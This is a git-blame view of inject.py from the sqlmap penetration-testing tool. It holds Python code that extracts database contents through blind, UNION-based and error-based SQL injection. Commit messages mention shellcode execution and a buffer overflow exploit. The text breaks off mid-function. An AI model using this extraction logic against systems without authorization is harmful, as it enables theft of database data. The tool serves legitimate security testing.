sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity
dabbcf9e23
sqlmap/lib/request/inject.py

468 lines
18 KiB
Python
Raw Normal View History

After the storm, a restore..
2008-10-15 19:38:22 +04:00
#!/usr/bin/env python
"""
propsets..
2008-10-15 19:56:32 +04:00
$Id$
After the storm, a restore..
2008-10-15 19:38:22 +04:00
large commit with copyright header modifications
2010-10-14 18:41:14 +04:00
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
sorry, cosmetics
2010-10-15 03:18:29 +04:00
See the file 'doc/COPYING' for copying permission
After the storm, a restore..
2008-10-15 19:38:22 +04:00
"""
import re
import time
from lib.core.agent import agent
added calculateDeltaSeconds method for dealing with non-deterministic time behaviour in some cases (e.g. WAITFOR DELAY in case of MSSQL)
2010-05-13 15:05:35 +04:00
from lib.core.common import calculateDeltaSeconds
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.common import cleanQuery
from lib.core.common import dataToSessionFile
cosmetics
2010-10-19 19:28:54 +04:00
from lib.core.common import dataToStdout
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.common import expandAsteriskForColumns
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup.
2008-12-10 20:23:07 +03:00
from lib.core.common import parseUnionPage
minor cosmetic update
2010-10-11 17:52:32 +04:00
from lib.core.common import popValue
from lib.core.common import pushValue
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.common import readInput
cosmetics
2010-10-19 19:28:54 +04:00
from lib.core.common import replaceNewlineTabs
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
from lib.core.common import safeStringFormat
from lib.core.convert import urlencode
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
minor refactoring
2010-10-20 03:05:24 +04:00
from lib.core.settings import ERROR_SPACE
from lib.core.settings import ERROR_EMPTY_CHAR
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
from lib.core.unescaper import unescaper
Initial implementation of support for stacked queries. Added method to test for Time based blind SQL injection query stacking on the affected parameter a SLEEP() or similar DBMS specific function. Adapted libraries, plugins and XML with the above changes. Minor layout adjustments.
2008-11-12 03:36:50 +03:00
from lib.request.connect import Connect as Request
Added support to directly connect also to Microsoft SQL Server database. Fixed direct connection to always use the same query as of UNION query SQL injection (= one query with multiple columns/entries output). Minor fixes to Firebird/Access/SQLite connectors to use connector's execute()/fetchall() as wrapper for third-party libraries' methods. Forced conf.timeout to 10 seconds when directly connecting to database. Slightly improved regular expression to parse -d parameter. Added import check for all connectors' third-party libraries. Code refactoring: * Moved conf.direct request to direct() function in lib/request/direct.py (code reused where needed). * Back-delegated to generic connector close() and other methods.
2010-03-31 14:50:47 +04:00
from lib.request.direct import direct
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.techniques.inband.union.use import unionUse
Properly moved and improved inject.goStacked() function and newly implemented Time based blind SQL injection now is a single test file within the lib/techniques/ folder. Renamed lib/techniques/inference to lib/techniques/blind, it is more approriate and adapted the rest of the libraries. Updated ChangeLog file.
2008-11-13 02:44:09 +03:00
from lib.techniques.blind.inference import bisection
After the storm, a restore..
2008-10-15 19:38:22 +04:00
from lib.utils.resume import queryOutputLength
from lib.utils.resume import resume
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
def __goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None):
Initial implementation of support for stacked queries. Added method to test for Time based blind SQL injection query stacking on the affected parameter a SLEEP() or similar DBMS specific function. Adapted libraries, plugins and XML with the above changes. Minor layout adjustments.
2008-11-12 03:36:50 +03:00
start = time.time()
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if ( conf.eta or conf.threads > 1 ) and kb.dbms:
_, length, _ = queryOutputLength(expression, payload)
else:
length = None
Minor fix
2008-10-16 19:39:25 +04:00
dataToSessionFile("[%s][%s][%s][%s][" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], expression))
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
added calculateDeltaSeconds method for dealing with non-deterministic time behaviour in some cases (e.g. WAITFOR DELAY in case of MSSQL)
2010-05-13 15:05:35 +04:00
debugMsg = "performed %d queries in %d seconds" % (count, calculateDeltaSeconds(start))
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
logger.debug(debugMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return value
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
def __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected=None, num=None, resumeValue=True, charsetType=None, firstChar=None, lastChar=None):
Major bug fix to make partial UNION query sql injection work properly also on Microsoft SQL Server
2008-12-22 22:36:01 +03:00
outputs = []
origExpr = None
After the storm, a restore..
2008-10-15 19:38:22 +04:00
for field in expressionFieldsList:
output = None
Limited custom query now works also on Oracle in inferential blind SQL injection technique
2008-12-24 02:34:50 +03:00
if field.startswith("ROWNUM "):
continue
Major bug fix to make partial UNION query sql injection work properly also on Microsoft SQL Server
2008-12-22 22:36:01 +03:00
if isinstance(num, int):
Major bug fix to make it work properly with MSSQL custom limited (SELECT TOP ...) queries with both inferential blind and Full UNION query injection
2009-01-03 02:26:45 +03:00
origExpr = expression
Major bug fix to make partial UNION query sql injection work properly also on Microsoft SQL Server
2008-12-22 22:36:01 +03:00
expression = agent.limitQuery(num, expression, field)
Limited custom query now works also on Oracle in inferential blind SQL injection technique
2008-12-24 02:34:50 +03:00
if "ROWNUM" in expressionFieldsList:
expressionReplaced = expression
Major bug fixes
2009-01-23 01:28:27 +03:00
else:
expressionReplaced = expression.replace(expressionFields, field, 1)
Limited custom query now works also on Oracle in inferential blind SQL injection technique
2008-12-24 02:34:50 +03:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if resumeValue:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
output = resume(expressionReplaced, payload)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Major bug fix so that when the expected value of a query (count variable) is an integer and for some reason the resumed value from session file is a string or a binary file, the query is executed again and and its new output saved to the session file
2008-11-02 22:21:19 +03:00
if not output or ( expected == "int" and not output.isdigit() ):
if output:
warnMsg = "expected value type %s, resumed '%s', " % (expected, output)
warnMsg += "sqlmap is going to retrieve the value again"
logger.warn(warnMsg)
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Major bug fix to make partial UNION query sql injection work properly also on Microsoft SQL Server
2008-12-22 22:36:01 +03:00
if isinstance(num, int):
expression = origExpr
After the storm, a restore..
2008-10-15 19:38:22 +04:00
outputs.append(output)
return outputs
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, resumeValue=True, unpack=True, charsetType=None, firstChar=None, lastChar=None):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
"""
Retrieve the output of a SQL query characted by character taking
advantage of an blind SQL injection vulnerability on the affected
parameter through a bisection algorithm.
"""
removed temp dictionary and replaced with kb.misc
2010-10-20 03:00:19 +04:00
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].inference)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
count = None
startLimit = 0
stopLimit = None
outputs = []
test = None
untilLimitChar = None
untilOrderChar = None
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if resumeValue:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
output = resume(expression, payload)
else:
output = None
After the storm, a restore..
2008-10-15 19:38:22 +04:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if output and ( expected is None or ( expected == "int" and output.isdigit() ) ):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return output
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if not unpack:
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
return __goInference(payload, expression, charsetType, firstChar, lastChar)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if kb.dbmsDetected:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
_, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(expression)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Initial support for SQLite (90% approx). Initial support for Firebird (30% approx). Initial support for Access (10% approx). Shared libraries code/installation scripts ported to 64bit, directory structure adapted. Minor code adjustments.
2010-03-18 20:20:54 +03:00
rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I)
if rdbRegExp and kb.dbms == "Firebird":
expressionFieldsList = [expressionFields]
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if len(expressionFieldsList) > 1:
infoMsg = "the SQL query provided has more than a field. "
infoMsg += "sqlmap will now unpack it into distinct queries "
infoMsg += "to be able to retrieve the output even if we "
infoMsg += "are going blind"
logger.info(infoMsg)
# If we have been here from SQL query/shell we have to check if
# the SQL query might return multiple entries and in such case
# forge the SQL limiting the query output one entry per time
# NOTE: I assume that only queries that get data from a table
# can return multiple entries
if fromUser and " FROM " in expression:
limitRegExp = re.search(queries[kb.dbms].limitregexp, expression, re.I)
Fixed another bug on Microsoft SQL Server custom "limited" query reported by Konrads Smelkovs
2009-02-03 02:44:19 +03:00
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Fixed another bug on Microsoft SQL Server custom "limited" query reported by Konrads Smelkovs
2009-02-03 02:44:19 +03:00
if limitRegExp or ( kb.dbms == "Microsoft SQL Server" and topLimit ):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if kb.dbms in ( "MySQL", "PostgreSQL" ):
limitGroupStart = queries[kb.dbms].limitgroupstart
limitGroupStop = queries[kb.dbms].limitgroupstop
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
Major bug fix to make it work properly with MSSQL custom limited (SELECT TOP ...) queries with both inferential blind and Full UNION query injection
2009-01-03 02:26:45 +03:00
elif kb.dbms == "Microsoft SQL Server":
Fixed another bug on Microsoft SQL Server custom "limited" query reported by Konrads Smelkovs
2009-02-03 02:44:19 +03:00
if limitRegExp:
limitGroupStart = queries[kb.dbms].limitgroupstart
limitGroupStop = queries[kb.dbms].limitgroupstop
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
elif topLimit:
startLimit = 0
stopLimit = int(topLimit.group(1))
limitCond = int(stopLimit) > 1
Major bug fix to make it work properly with MSSQL custom limited (SELECT TOP ...) queries with both inferential blind and Full UNION query injection
2009-01-03 02:26:45 +03:00
elif kb.dbms == "Oracle":
After the storm, a restore..
2008-10-15 19:38:22 +04:00
limitCond = False
else:
limitCond = True
# I assume that only queries NOT containing a "LIMIT #, 1"
# (or similar depending on the back-end DBMS) can return
# multiple entries
if limitCond:
if limitRegExp:
stopLimit = int(stopLimit)
# From now on we need only the expression until the " LIMIT "
# (or similar, depending on the back-end DBMS) word
if kb.dbms in ( "MySQL", "PostgreSQL" ):
stopLimit += startLimit
untilLimitChar = expression.index(queries[kb.dbms].limitstring)
expression = expression[:untilLimitChar]
Major bug fix to make it work properly with MSSQL custom limited (SELECT TOP ...) queries with both inferential blind and Full UNION query injection
2009-01-03 02:26:45 +03:00
elif kb.dbms == "Microsoft SQL Server":
stopLimit += startLimit
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if not stopLimit or stopLimit <= 1:
if kb.dbms == "Oracle" and expression.endswith("FROM DUAL"):
test = "n"
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
elif batch:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
test = "y"
After the storm, a restore..
2008-10-15 19:38:22 +04:00
else:
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup.
2008-12-10 20:23:07 +03:00
message = "can the SQL query provided return "
message += "multiple entries? [Y/n] "
After the storm, a restore..
2008-10-15 19:38:22 +04:00
test = readInput(message, default="Y")
if not test or test[0] in ("y", "Y"):
# Count the number of SQL query entries output
countFirstField = queries[kb.dbms].count % expressionFieldsList[0]
countedExpression = expression.replace(expressionFields, countFirstField, 1)
if re.search(" ORDER BY ", expression, re.I):
untilOrderChar = countedExpression.index(" ORDER BY ")
countedExpression = countedExpression[:untilOrderChar]
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if resumeValue:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
count = resume(countedExpression, payload)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if not stopLimit:
Major bug fix so that when the expected value of a query (count variable) is an integer and for some reason the resumed value from session file is a string or a binary file, the query is executed again and and its new output saved to the session file
2008-11-02 22:21:19 +03:00
if not count or not count.isdigit():
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
count = __goInference(payload, countedExpression, charsetType, firstChar, lastChar)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup.
2008-12-10 20:23:07 +03:00
if count and count.isdigit() and int(count) > 0:
After the storm, a restore..
2008-10-15 19:38:22 +04:00
count = int(count)
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if batch:
After the storm, a restore..
2008-10-15 19:38:22 +04:00
stopLimit = count
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
else:
message = "the SQL query provided can return "
message += "up to %d entries. How many " % count
message += "entries do you want to retrieve?\n"
message += "[a] All (default)\n[#] Specific number\n"
message += "[q] Quit"
test = readInput(message, default="a")
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if not test or test[0] in ("a", "A"):
stopLimit = count
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
elif test[0] in ("q", "Q"):
return "Quit"
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
elif test.isdigit() and int(test) > 0 and int(test) <= count:
stopLimit = int(test)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
infoMsg = "sqlmap is now going to retrieve the "
infoMsg += "first %d query output entries" % stopLimit
logger.info(infoMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
elif test[0] in ("#", "s", "S"):
message = "How many? "
stopLimit = readInput(message, default="10")
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if not stopLimit.isdigit():
errMsg = "Invalid choice"
logger.error(errMsg)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
return None
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
else:
stopLimit = int(stopLimit)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
else:
errMsg = "Invalid choice"
logger.error(errMsg)
return None
After the storm, a restore..
2008-10-15 19:38:22 +04:00
Minor adjustments and bug fixes
2008-12-17 23:11:18 +03:00
elif count and not count.isdigit():
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the SQL query provided. "
warnMsg += "sqlmap will assume that it returns only "
warnMsg += "one entry"
logger.warn(warnMsg)
stopLimit = 1
After the storm, a restore..
2008-10-15 19:38:22 +04:00
elif ( not count or int(count) == 0 ):
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup.
2008-12-10 20:23:07 +03:00
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
After the storm, a restore..
2008-10-15 19:38:22 +04:00
logger.warn(warnMsg)
return None
elif ( not count or int(count) == 0 ) and ( not stopLimit or stopLimit == 0 ):
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup.
2008-12-10 20:23:07 +03:00
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
After the storm, a restore..
2008-10-15 19:38:22 +04:00
logger.warn(warnMsg)
return None
for num in xrange(startLimit, stopLimit):
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
output = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, num, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
outputs.append(output)
return outputs
elif kb.dbms == "Oracle" and expression.startswith("SELECT ") and " FROM " not in expression:
expression = "%s FROM DUAL" % expression
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
returnValue = ", ".join([output for output in outputs])
Major enhancement to support Partial UNION query SQL injection technique too. Minor code cleanup.
2008-12-10 20:23:07 +03:00
After the storm, a restore..
2008-10-15 19:38:22 +04:00
else:
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
returnValue = __goInference(payload, expression, charsetType, firstChar, lastChar)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return returnValue
Minor bug fix to consider --start and --stop also in partial UNION query SQL injection
2010-04-30 19:48:40 +04:00
def __goInband(expression, expected=None, sort=True, resumeValue=True, unpack=True, dump=False):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
"""
Retrieve the output of a SQL query taking advantage of an inband SQL
injection vulnerability on the affected parameter.
"""
output = None
partial = False
data = []
condition = (
kb.resumedQueries and conf.url in kb.resumedQueries.keys()
and expression in kb.resumedQueries[conf.url].keys()
)
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if condition and resumeValue:
After the storm, a restore..
2008-10-15 19:38:22 +04:00
output = resume(expression, None)
Major bug fix so that when the expected value of a query (count variable) is an integer and for some reason the resumed value from session file is a string or a binary file, the query is executed again and and its new output saved to the session file
2008-11-02 22:21:19 +03:00
if not output or ( expected == "int" and not output.isdigit() ):
After the storm, a restore..
2008-10-15 19:38:22 +04:00
partial = True
if not output:
Minor bug fix to consider --start and --stop also in partial UNION query SQL injection
2010-04-30 19:48:40 +04:00
output = unionUse(expression, resetCounter=True, unpack=unpack, dump=dump)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
if output:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
data = parseUnionPage(output, expression, partial, condition, sort)
After the storm, a restore..
2008-10-15 19:38:22 +04:00
return data
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
def __goError(expression, resumeValue=True):
"""
Retrieve the output of a SQL query taking advantage of an error SQL
injection vulnerability on the affected parameter.
"""
removed temp dictionary and replaced with kb.misc
2010-10-20 03:00:19 +04:00
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
first successfull run of error based sqlmap in history :). tested --banner, --current-user, --current-db on 4 major DBMSes. still hidden from users (turn on flag error in getValue() in inject.py)
2010-10-19 16:02:04 +04:00
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
if resumeValue:
output = resume(expression, payload)
else:
output = None
if output and ( expected is None or ( expected == "int" and output.isdigit() ) ):
return output
fix for that 'Subquery returns more than 1 row'
2010-10-20 12:50:05 +04:00
if kb.dbmsDetected:
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
if kb.dbms == "MySQL":
nulledCastedField = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row'
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
